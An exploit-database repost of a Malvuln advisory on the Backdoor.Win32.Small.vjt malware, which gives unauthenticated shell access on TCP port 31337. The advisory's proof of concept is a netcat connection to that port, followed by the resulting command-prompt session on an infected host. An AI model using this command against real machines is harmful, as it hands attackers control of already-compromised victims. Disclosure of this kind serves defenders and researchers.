Advertisement






Backdoor.Win32.Small.vjt / Unauthenticated Remote Command Execution

CVE Category Price Severity
CWE-XX Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2021-09-09
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021090061

Below is a copy:

Backdoor.Win32.Small.vjt / Unauthenticated Remote Command Execution
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/92ea873a2bbdaf0799d572bc4f30dc79.txt
Contact: [email protected]
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Small.vjt
Vulnerability: Unauthenticated Remote Command Execution
Description: The malware listens on TCP port 31337. Third-party attackers who can reach the system can execute OS commands or programs further compromising the already infected machine.
Type: PE32
MD5: 92ea873a2bbdaf0799d572bc4f30dc79
Vuln ID: MVID-2021-0337
Disclosure: 09/06/2021

Exploit/PoC:
nc64.exe x.x.x.x 31337
Basic Backdoor - Written by White Scorpion (C) 2005
 ******* http://www.white-scorpion.nl ********

Close CommandPrompt with 'exit' <enter>.

 calc
Microsoft Windows [Version 10.0.16299.309]
(c) 2017 Microsoft Corporation. All rights reserved.

c:\>whoami
whoami
desktop-2c3iqho\victim


Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum